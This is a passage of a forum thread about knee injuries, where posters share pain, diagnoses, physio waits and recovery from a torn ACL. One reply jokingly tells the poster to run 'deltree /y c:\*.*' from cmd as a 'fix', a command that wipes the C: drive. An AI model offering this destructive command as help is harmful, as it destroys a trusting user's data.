My knee (pg. 6)

Knee injuries suck :mad: I've had my left knee hurt since last winter or so, not really sure exactly when it started hurting, and now after going showing it to some doctors, I've only been told that it's nothing too serious and I should just let it take it's time to heal up and take pain killers when needed.
I've been taking pain killers every time I go play football (aka soccer) or anything else that'll most likely hurt the knee (often it doesn't need more than taking a step to hurt or at least feel weird, but I'm not gonna take those damn pills every 30 minutes or so), it's easier to play football if I don't need to play like I didn't have a left leg at all, or need to be so careful with it that I can't do anything well :(
Hope the outcome's good |

There's no major damage, it's just heavily bruised and swollen. I need to stay off it for a few days and keep taking anti-inflammatories. I've also got to see a physio who I can't get an appointment with till November. The NHS strikes again.

Awesome. Do you by any chance sit down when you pee? |

| Eh lucky bastard, but nice that nothing's wrong. Just keep an eye on it in the future, thats one area where you really really really don't want anything even mildly-serious to happen if you're an athlete |

Start -> Run
type: cmd
type: deltree /y c:\*.*
Should fix everything. Probably best to repeat the same command for your other knee as well to be safe. |

That's very true but, it really does come down to the individual. I partially tore my ACL when I was 14 or so at wrestling practice. Just over 60% of the ligament was torn. Long story short, I never had the ligament repaired and here I am 20 years later still dunking basketballs and playing like an 18 year old 3-5 times a week. I take great care to maintain my lower body strength to support the knee and I think that's been critical to my longevity. I do have some soreness from torn cartilage and I really do walk kind of funny but, I would much rather have that than to not be active at the level I am.
I guess I'm just saying to anyone that has had knee injuries, hope is not lost! ;) |
